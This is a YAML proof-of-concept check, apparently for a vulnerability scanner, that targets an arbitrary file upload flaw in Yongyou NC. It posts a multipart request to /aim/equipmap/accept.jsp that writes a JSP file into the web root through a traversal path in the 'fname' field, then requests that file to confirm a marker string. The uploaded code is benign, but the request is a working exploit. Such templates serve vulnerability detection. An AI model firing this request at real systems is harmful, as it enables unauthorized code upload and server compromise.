name: yongyou-nc-accept-upload
set:
    r1: randomLowercase(8)
    r2: randomLowercase(32)
    rboundary: randomLowercase(8)
rules:
  - method: POST
    path: "/aim/equipmap/accept.jsp"
    headers:
      Cookie: JSESSIONID=33A7E4A8F9A2F3D7EACA2768A172B7F5.server
      Content-Type: multipart/form-data; boundary=--------WebKitFormBoundary{{rboundary}}
    body: "\
      ----------WebKitFormBoundary{{rboundary}}\r\n\
      Content-Disposition: form-data; name=\"file\";filename=\"{{r1}}.txt\"\r\n\
      \r\n\
      <% out.println(\"hello yongyou nc {{r2}}\");%>\r\n\
      ----------WebKitFormBoundary{{rboundary}}\r\n\
      Content-Disposition: form-data; name=\"fname\"\r\n\
      \r\n\
      \\\\webapps\\\\nc_web\\\\{{r1}}.jsp\r\n\
      ----------WebKitFormBoundary{{rboundary}}--\r\n\
      "
    expression: |
      response.status == 200
  - method: GET
    path: "/{{r1}}.jsp"
    expression: |
      response.status == 200 && response.body.bcontains(bytes(r2))
detail:
  author: 666